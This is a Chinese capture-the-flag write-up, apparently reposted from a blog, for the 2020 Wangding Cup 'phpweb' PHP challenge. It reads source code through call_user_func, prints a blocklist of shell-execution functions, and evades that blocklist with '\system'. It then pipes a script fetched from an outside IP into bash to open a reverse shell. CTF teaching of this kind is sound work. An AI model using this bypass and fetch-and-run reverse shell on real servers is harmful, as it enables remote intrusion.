[網(wǎng)鼎杯 2020 朱雀組]phpweb

通過反彈shell獲取flag

打開鏈接，顯示一個不斷刷新的頁面，通過burp抓包查看

通過對頁面源代碼的分析，發(fā)現(xiàn)在本頁面中，通過post傳入index.php中兩個參數(shù)，通過對參數(shù)的修改，發(fā)現(xiàn)用到了call_user_func()函數(shù)

故猜測本題通過func傳入php函數(shù)名，通過p參數(shù)傳入函數(shù)值，嘗試讀取index.php文件內容

利用

func=file_get_contents&p=index.php func=readfile&p=index.php

讀取到index.php文件內容，對代碼進行分析

$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter","array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);//將傳入的兩個參數(shù)，賦給call_user_func函數(shù)，作為參數(shù)執(zhí)行$a= gettype($result);//判斷返回類型，若為字符串就輸出對應的結果if ($a == "string") {return $result;} else {return "";}}class Test {//構造反序列化時，可以利用這個類var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);//func值不為空，即調用gettime函數(shù)}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"]; //接收get或post傳入的值if ($func != null) { //判斷非空$func = strtolower($func); //轉換成小寫if (!in_array($func,$disable_fun)) { //過濾掉被禁用的函數(shù)之后執(zhí)行函數(shù)gettimeecho gettime($func, $p);}else {die("Hacker...");}}

可以通過反序列化搭配命令執(zhí)行求解，也可以只通過命令執(zhí)行求解，但是重點介紹本題通過反彈shell的做法

在攻擊機中，新建一個能反彈shell的命令文件（1.txt），里面寫入命令：bash -i >& /dev/tcp/ip/port 0>&1,ip是服務器ip，port為2002

本地curl測試：

同理可以構造命令進行反彈shell：

func=\system&p=curl http://101.43.119.212/YKingH/test/1.txt|bash

連接成功

總結

以上是生活随笔為你收集整理的[网鼎杯 2020 朱雀组]phpweb-反弹shell的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內容還不錯，歡迎將生活随笔推薦給好友。